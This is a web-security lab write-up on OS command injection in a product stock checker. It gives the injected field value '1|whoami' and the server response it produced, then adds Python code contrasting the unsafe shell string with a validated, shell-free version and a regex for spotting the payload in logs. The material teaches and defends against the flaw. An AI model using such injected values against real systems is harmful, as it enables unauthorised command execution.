OS command injection, simple case
Description
This lab contains an OS command injection vulnerability in the product stock checker. The application executes a shell command containing the user-supplied product and store IDs, and returns the raw output from the command in its response.
Reproduction and proof of concept
Use Burp Suite to intercept and modify a request that checks the stock level.
Modify the storeId parameter, giving it the value 1|whoami.
productId=1&storeId=1|whoami
Observe that the response contains the name of the current user.
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 13
peter-gmkX5d
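The root cause above is that the IDs reach a shell as part of one command string. The following added example (not part of the lab or its solution) shows that pattern next to a hardened version that allow-lists the IDs and passes them as separate arguments with no shell, plus a small check that flags request bodies like the one above in a log. The stock-checker path and the sample request bodies are assumptions constructed for the example.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Hypothetical path of the stock-checker program; the lab does not reveal it.
STOCK_CHECKER = "/usr/local/bin/stockreport"
# Allow-list: a legitimate ID is a short decimal integer, nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,9}")

def vulnerable_command(product_id: str, store_id: str) -> str:
    """The lab's unsafe pattern: both IDs interpolated into one shell string,
    so a '|' in storeId starts a second command."""
    return f"{STOCK_CHECKER} {product_id} {store_id}"

def validate_id(value: str) -> int:
    """Reject anything that is not a plain decimal ID."""
    if not ID_PATTERN.fullmatch(value):
        raise ValueError(f"rejected non-numeric ID: {value!r}")
    return int(value)

def hardened_argv(product_id: str, store_id: str) -> list[str]:
    """Validate, then build an argv list; with shell=False each value is one
    argument and is never parsed by a shell."""
    return [STOCK_CHECKER, str(validate_id(product_id)), str(validate_id(store_id))]

def run_stock_check(product_id: str, store_id: str) -> str:
    result = subprocess.run(hardened_argv(product_id, store_id), shell=False,
                            capture_output=True, text=True, check=True)
    return result.stdout

# Detection side: shell metacharacters have no business in a numeric ID.
METACHARS = re.compile(r"[|;&`$<>\n]")
# Constructed request bodies standing in for a web-server or WAF log.
SAMPLE_BODIES = [
    "productId=1&storeId=1",
    "productId=2&storeId=1|whoami",
    "productId=3&storeId=",
]

def suspicious_bodies(bodies: list[str]) -> list[str]:
    """Return bodies whose productId or storeId carries a shell metacharacter."""
    hits = []
    for body in bodies:
        params = parse_qs(body, keep_blank_values=True)
        values = params.get("productId", []) + params.get("storeId", [])
        if any(METACHARS.search(v) for v in values):
            hits.append(body)
    return hits
```

With the allow-list in place the payload from the walkthrough is rejected before any process is started, and the same check applied to logged bodies surfaces the attempt.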
Exploitability
An attacker will need to execute the whoami command to determine the name of the current user.